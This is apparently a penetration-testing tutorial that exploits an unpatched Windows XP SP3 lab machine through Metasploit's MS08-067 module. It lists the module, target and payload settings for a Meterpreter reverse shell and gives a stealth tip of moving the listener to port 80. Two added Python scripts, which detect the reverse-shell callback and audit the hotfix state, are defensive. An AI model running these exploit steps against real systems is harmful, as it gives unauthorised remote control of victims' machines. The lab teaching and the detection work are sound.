In this article we’ll walk you through exploiting a live install of Windows XP Service Pack 3. We’ll make use of the well-known vulnerability in netapi32.dll in the Windows operating system.
The vulnerability is particularly dangerous because the attacker does not need to authenticate to the target machine before running the attack.
This article is inspired by the book Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, a great resource for learning about hacking and penetration testing.
The exploit module we’ll make use of through the Metasploit framework is called exploit/windows/smb/ms08_067_netapi.
But why Windows XP SP3? Does anybody still even use it?
Before continuing with this tutorial, you’ll need to:
- Have a virtual machine running Kali Linux.
- Have a virtual machine running an unpatched version of Windows XP Service Pack 3.
- Possess basic knowledge of the Linux command line.
Please note that it is illegal to perform this attack without the victim’s permission!
Using Metasploit to exploit Windows XP
Start off by firing up both virtual machines.
Log into Kali Linux, and fire up a terminal window.
The first thing we’ll need to do is to start the Metasploit Framework.
Enter these commands into the terminal window:
- service postgresql start
- msfconsole
The first command, service postgresql start, launches a PostgreSQL database, which Metasploit uses to keep track of your work.
The next command, msfconsole, launches the Metasploit text-based console. This is where we’ll perform our attack!
The details of everything you can do with Metasploit (hacking Windows 7, etc.) are out of scope for this tutorial, but Georgia Weidman covers this in great detail in her book.
After msfconsole has finished loading (which can take a while), you should see something like this:
As previously mentioned, we’ll use the module exploit/windows/smb/ms08_067_netapi. We tell Metasploit which module to use by entering the following command:
- use windows/smb/ms08_067_netapi
Now that we’ve told Metasploit which exploit module we’d like to use, we need to set some options. Enter this into the command line to show all available options:
- show options
As you can see, there are not many options that need to be set.
- RHOST: This is the target machine’s IP address. We’ll set this in the next step.
- RPORT: This is the port we’ll perform our attack through. The default of 445 is fine.
- SMBPIPE: Browser is the correct SMBPIPE for this attack.
- Exploit Target: This is the target operating system. Automatic targeting is fine for this attack.
In other words, the only option we need to set is the target IP address. You can find it by running ipconfig in cmd on your Windows VM. In my case, the IP address is 10.0.0.17.
- set RHOST 10.0.0.17
The exploit module is now configured and ready to go. But we also have to tell Metasploit which payload it should deliver to the target machine. In this attack we’ll use the payload windows/meterpreter/reverse_tcp.
- set payload windows/meterpreter/reverse_tcp
The payload windows/meterpreter/reverse_tcp will create a reverse shell.
A reverse shell pushes a connection from the target machine (Windows) back to the attacker (Kali).
In practice, this means that our Kali machine will open a local port, 4444 by default (LPORT), and listen for a connection from the target machine.
Note that this isn’t stealthy at all. You should at least change the LPORT to a regular port number like 80 (HTTP) to have any chance of succeeding.
You may have noticed that the LHOST field is empty. We’ll need to set LHOST to our Kali machine’s IP address, which is 10.0.0.107 in my case.
The payload needs this information so that the victim machine can connect back to the attacking machine!
- set LHOST 10.0.0.107
Everything is now set up in Metasploit. Before proceeding, make sure that the Windows firewall is deactivated on your Windows VM.
You should also create a text file on the desktop of the Windows VM. The content can be anything you like; we’ll just use it to illustrate the power of this attack!
Now that you’re all set and ready to go, let’s exploit the target machine! Type this command to proceed:
By god, we are in!
What has actually happened here?
When exploiting our target machine (Windows XP), we delivered a payload which initiated a reverse shell connection.
The reverse shell made our target machine connect back to the attacking machine (Kali Linux), providing a shell connection directly to the Windows Operating System!
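The reverse shell described above has a recognisable shape on the wire: an inbound connection to the victim’s SMB port (445), followed within seconds by a new outbound connection from the victim back to the same peer. The script below is an added example and is not part of the original post or of Metasploit; it correlates those two events in constructed connection-log lines (the log format, the timestamps and the 30-second window are assumptions, the two IP addresses are the ones used in this article). Because it keys on the peer address rather than on port 4444, it still fires when LPORT has been changed to 80 as suggested earlier.

```python
"""Spot a reverse-shell callback that follows inbound SMB traffic.

Added example (not from the article or from Metasploit). The log format
is an assumption: one line per connection, as a firewall or NetFlow
exporter might produce it,
    <ISO timestamp> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <in|out>
where the direction is relative to the monitored host 10.0.0.17.
"""
import re
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"(?P<ts>\S+) (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<dir>in|out)$"
)

# Constructed sample. Records 1-2: the article's attack with the default
# LPORT 4444. Records 3-4: the same attack with LPORT changed to 80.
# Records 5-6: an ordinary SMB exchange with a file server, 60 s apart,
# so outside the default window. Record 7: unrelated web traffic.
SAMPLE_LOG = """\
2024-01-01T10:00:00 10.0.0.107:51000 -> 10.0.0.17:445 in
2024-01-01T10:00:02 10.0.0.17:1034 -> 10.0.0.107:4444 out
2024-01-01T10:05:00 10.0.0.107:51010 -> 10.0.0.17:445 in
2024-01-01T10:05:01 10.0.0.17:1040 -> 10.0.0.107:80 out
2024-01-01T10:30:00 10.0.0.50:52000 -> 10.0.0.17:445 in
2024-01-01T10:31:00 10.0.0.17:1050 -> 10.0.0.50:445 out
2024-01-01T11:00:00 10.0.0.17:1060 -> 10.0.0.200:80 out
"""


def parse_log(text):
    """Turn the log text into a list of event dicts; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        events.append({
            "ts": datetime.fromisoformat(d["ts"]),
            "src": d["src"], "sport": int(d["sport"]),
            "dst": d["dst"], "dport": int(d["dport"]),
            "dir": d["dir"],
        })
    return events


def find_callbacks(events, window_seconds=30):
    """Return (victim, peer, callback_port) for every outbound connection that
    follows an inbound SMB connection from the same peer within the window.
    Deliberately port-agnostic: the callback port is whatever LPORT was set to."""
    window = timedelta(seconds=window_seconds)
    last_smb = {}  # (victim, peer) -> time of the latest inbound SMB connection
    hits = []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        if e["dir"] == "in" and e["dport"] == 445:
            last_smb[(e["dst"], e["src"])] = e["ts"]
        elif e["dir"] == "out":
            t = last_smb.get((e["src"], e["dst"]))
            if t is not None and timedelta(0) <= e["ts"] - t <= window:
                hits.append((e["src"], e["dst"], e["dport"]))
    return hits


if __name__ == "__main__":
    for victim, peer, port in find_callbacks(parse_log(SAMPLE_LOG)):
        print(f"ALERT: {victim} connected back to {peer}:{port} shortly after inbound SMB")
```

Widening the window trades false negatives for false positives: at 90 seconds the benign file-server exchange in records 5 and 6 is reported too, which is why a rule like this is usually paired with an allow-list of known SMB peers.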
Let’s navigate to the file we created earlier in the Desktop folder (on the Administrator user in my case):
Alright, now we only need to change to the Desktop folder and view the content of the file with the cat command.
Congratulations! You have now gained access to a remote Windows XP operating system, using the exploit/windows/smb/ms08_067_netapi exploit!
If you like this kind of content, I highly recommend you to check out Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, a great resource for learning about hacking and penetration testing.
Time to update your Windows XP installation, eh?
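Checking that the update is actually in place is the defender’s half of this story. The script below is an added example, not part of the original post or of Metasploit: it parses constructed stand-ins for the output of `wmic qfe get HotFixID` and `netstat -an` on the Windows VM and reports whether the MS08-067 hotfix is installed, whether SMB is listening, and which connections are established (the netstat sample is taken while the reverse shell from this article is connected, so its last line is the callback to 10.0.0.107:4444). The outputs and the filler KB numbers are constructed; KB958644 is the Microsoft update that shipped with bulletin MS08-067, a known identifier that the article itself does not mention.

```python
"""Audit a Windows XP host's exposure to MS08-067 from command output.

Added example (not from the article or from Metasploit). The two outputs
below are constructed stand-ins for `wmic qfe get HotFixID` and
`netstat -an` on the Windows VM; the IP addresses are the article's.
KB958644 is the update shipped with bulletin MS08-067; KB111111 and
KB222222 are made-up filler.
"""

MS08_067_HOTFIX = "KB958644"
SMB_PORTS = {139, 445}  # NetBIOS session service and direct-hosted SMB

HOTFIX_OUTPUT_UNPATCHED = """\
HotFixID
KB111111
KB222222
"""

HOTFIX_OUTPUT_PATCHED = """\
HotFixID
KB111111
KB222222
KB958644
"""

# Captured (constructed) while the reverse shell is connected: the last
# row is the victim's callback to the attacking machine on LPORT 4444.
NETSTAT_OUTPUT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    10.0.0.17:139          0.0.0.0:0              LISTENING
  TCP    10.0.0.17:1034         10.0.0.107:4444        ESTABLISHED
"""


def installed_hotfixes(wmic_output):
    """Set of KB identifiers found in `wmic qfe get HotFixID` output."""
    return {ln.strip().upper() for ln in wmic_output.splitlines()
            if ln.strip().upper().startswith("KB")}


def tcp_table(netstat_output):
    """Parse `netstat -an` into (local, foreign, state) tuples for TCP rows."""
    rows = []
    for ln in netstat_output.splitlines():
        parts = ln.split()
        if len(parts) == 4 and parts[0] == "TCP":
            rows.append((parts[1], parts[2], parts[3]))
    return rows


def port_of(addr):
    """Port number from an 'ip:port' string (IPv4 only, as on XP here)."""
    return int(addr.rsplit(":", 1)[1])


def assess(wmic_output, netstat_output):
    """Combine patch state and the TCP table into a small exposure report."""
    patched = MS08_067_HOTFIX in installed_hotfixes(wmic_output)
    rows = tcp_table(netstat_output)
    listening = {port_of(local) for local, _, state in rows if state == "LISTENING"}
    established = [(local, foreign) for local, foreign, state in rows
                   if state == "ESTABLISHED"]
    smb_listening = bool(listening & SMB_PORTS)
    if patched:
        risk = "LOW"      # the vulnerable Server service code path is fixed
    elif smb_listening:
        risk = "HIGH"     # unpatched and reachable as soon as the firewall lets 445 through
    else:
        risk = "MEDIUM"   # unpatched, but nothing is listening on the SMB ports right now
    return {"patched": patched, "smb_listening": smb_listening,
            "listening_ports": sorted(listening), "established": established,
            "risk": risk}


if __name__ == "__main__":
    for label, out in (("unpatched", HOTFIX_OUTPUT_UNPATCHED),
                       ("patched", HOTFIX_OUTPUT_PATCHED)):
        print(label, assess(out, NETSTAT_OUTPUT))
```

The established-connection list is the same artifact an incident responder would look for on a suspect host: a connection from an ephemeral local port to another machine on a port that no legitimate service on that machine should own.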